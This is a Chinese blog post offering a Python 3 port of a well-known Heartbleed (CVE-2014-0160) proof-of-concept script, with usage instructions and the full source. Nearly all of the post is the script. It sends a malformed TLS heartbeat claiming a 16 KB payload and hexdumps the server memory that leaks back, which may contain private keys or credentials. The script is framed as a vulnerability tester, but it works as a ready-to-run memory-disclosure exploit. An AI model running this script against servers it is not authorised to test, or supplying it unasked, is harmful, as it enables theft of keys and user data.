
2019-07-22 15:57:34

网络上用于测试 OpenSSL Heartbleed 漏洞(CVE-2014-0160)的 Python 脚本都是 Python 2 版本,与 Python 3 不兼容。
修改后的脚本如下。
用法:python ssltest.py 被测试IP -p 443

  1. #!/usr/bin/python

  2. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  3. # The author disclaims copyright to this source code.

  4. import sys
  5. import struct
  6. import socket
  7. import time
  8. import select
  9. import re
  10. from optparse import OptionParser
  11. import binascii

# Command-line interface: the usage string names a positional server, and the
# only option is the TCP port.
options = OptionParser(
    usage='%prog server [options]',
    description='Test for SSL heartbeat vulnerability (CVE-2014-0160)',
)
options.add_option(
    '-p',
    '--port',
    type='int',
    default=443,
    help='TCP port to test (default: 443)',
)

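def h2bin(x):
    """Convert whitespace-separated hex text into the raw bytes it spells out.

    Args:
        x: Hex digits as a str; spaces and newlines between digits are ignored.

    Returns:
        bytes: one byte per pair of hex digits, in order.

    Raises:
        binascii.Error: if the text left after stripping spaces and newlines
            is not valid even-length hex.
    """
    hex_text = x.replace(' ', '').replace('\n', '')
    # unhexlify decodes hex digits into bytes. hexlify would do the opposite:
    # hex-encode the ASCII text of the digits, so '16' would become b'3136'
    # instead of b'\x16' and the result would not be the intended record.
    return binascii.unhexlify(hex_text)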

# ClientHello record, written as hex text and passed through h2bin().
# Record header: 16 = record type 22 (handshake), 03 02 = protocol version,
# 00 dc = record length. main() sends this first and then waits for type-22
# records from the server.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Heartbeat record, written as hex text and passed through h2bin().
# Record header: 18 = record type 24 (heartbeat), 03 02 = protocol version,
# 00 03 = record length (3 bytes). Body: 01 = heartbeat request, 40 00 =
# claimed payload length 0x4000, with no payload bytes following it.
# hit_hb() reports the server as vulnerable when the reply is longer than
# 3 bytes.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')

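def hexdump(s):
    """Print a hex and printable-ASCII dump of *s*, 16 bytes per row.

    Each row shows the offset in hex, the bytes in hex, and the same bytes as
    text with anything outside printable ASCII (32..126) shown as '.'. A blank
    line is printed after the last row.

    Args:
        s: bytes-like data to dump.
    """
    # range replaces the Python 2-only xrange, which raises NameError on
    # Python 3.
    for offset in range(0, len(s), 16):
        row = bytes(s[offset:offset + 16])
        # Iterating bytes yields ints on Python 3, so ord() must not be
        # applied to the elements.
        hex_part = ' '.join('%02X' % byte for byte in row)
        text_part = ''.join(
            chr(byte) if 32 <= byte <= 126 else '.' for byte in row
        )
        print(' %04x: %-48s %s' % (offset, hex_part, text_part))
    # A bare `print` is a no-op expression on Python 3; it has to be called
    # to emit the trailing blank line.
    print()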

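def recvall(s, length, timeout=5):
    """Read exactly *length* bytes from socket *s*, or give up.

    Args:
        s: connected socket (anything select() and recv() accept).
        length: number of bytes to read.
        timeout: time budget in seconds for the whole read.

    Returns:
        The bytes read, or None if the peer closed the connection or the
        time budget ran out before *length* bytes arrived.
    """
    # monotonic() is not affected by wall-clock adjustments during the wait.
    deadline = time.monotonic() + timeout
    chunks = []
    remaining = length
    while remaining > 0:
        time_left = deadline - time.monotonic()
        if time_left < 0:
            return None
        # Wait no longer than the budget that is left. A fixed 5-second wait
        # here would let a short timeout overrun by several seconds.
        readable, _, _ = select.select([s], [], [], time_left)
        if s in readable:
            data = s.recv(remaining)
            if not data:  # empty read: the peer closed the connection
                return None
            chunks.append(data)
            remaining -= len(data)
    return b''.join(chunks)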

def recvmsg(s):
    """Read one record from *s*: a 5-byte header followed by its payload.

    Returns:
        (type, version, payload) on success, or (None, None, None) when
        recvall() could not deliver the header or the payload in full.
    """
    failure = (None, None, None)

    header = recvall(s, 5)
    if header is None:
        print ('Unexpected EOF receiving record header - server closed connection')
        return failure

    # Header layout, big-endian: 1-byte type, 2-byte version, 2-byte length.
    rec_type, rec_version, payload_len = struct.unpack('>BHH', header)

    # The payload read gets a longer time budget (10 s) than the header read.
    payload = recvall(s, payload_len, 10)
    if payload is None:
        print ('Unexpected EOF receiving record payload - server closed connection')
        return failure

    summary = ' ... received message: type = %d, ver = %04x, length = %d'
    print (summary % (rec_type, rec_version, len(payload)))
    return rec_type, rec_version, payload

def hit_hb(s):
    """Send the heartbeat request on *s* and classify the server's reply.

    Returns:
        True if a heartbeat record (type 24) came back, False if no record
        could be read or the server answered with an alert (type 21).
        Records of any other type are skipped and the wait continues.
    """
    s.send(hb)
    while True:
        rec_type, _version, payload = recvmsg(s)

        if rec_type is None:
            print ('No heartbeat response received, server likely not vulnerable')
            return False
        elif rec_type == 24:
            print ('Received heartbeat response:')
            # The dump shows whatever the server sent back; on a vulnerable
            # server that is process memory and may hold keys or credentials,
            # so the output should be handled as sensitive data.
            hexdump(payload)
            # More than 3 bytes in the reply is what this check reports as
            # vulnerable.
            if len(payload) > 3:
                print ('WARNING: server returned more data than it should - server is vulnerable!')
            else:
                print ('Server processed malformed heartbeat, but did not return any extra data.')
            return True
        elif rec_type == 21:
            print ('Received alert:')
            hexdump(payload)
            print ('Server returned error, likely not vulnerable')
            return False

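def main():
    """Connect to the server named on the command line and run the heartbeat check.

    Sends the ClientHello, reads records until a handshake record (type 22)
    whose first byte is 0x0E arrives, then sends the heartbeat request and
    lets hit_hb() report the result. Prints the usage text and returns when
    no server argument is given.
    """
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    # The context manager closes the socket on every exit path, including the
    # early return below; without it the socket is never closed.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        print('Connecting...', flush=True)
        s.connect((args[0], opts.port))
        print('Sending Client Hello...', flush=True)
        # sendall() keeps writing until the whole record is out; send() may
        # stop after a partial write.
        s.sendall(hello)
        print('Waiting for Server Hello...', flush=True)
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print('Server closed connection without sending Server Hello.')
                return
            # Look for server hello done message. Indexing bytes yields an int
            # on Python 3, so compare directly instead of calling ord(); the
            # `pay` guard covers a record whose length is 0.
            # NOTE(review): only the first byte of each record is checked, so
            # a hello-done message that follows other messages inside the
            # same record is not recognized.
            if typ == 22 and pay and pay[0] == 0x0E:
                break

        print('Sending heartbeat request...', flush=True)
        s.sendall(hb)
        # NOTE(review): hit_hb() sends the same request again before reading;
        # confirm the duplicate is intended.
        hit_hb(s)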

# Script entry point: run the check on direct execution only, not on import.
if __name__ == "__main__":
    main()

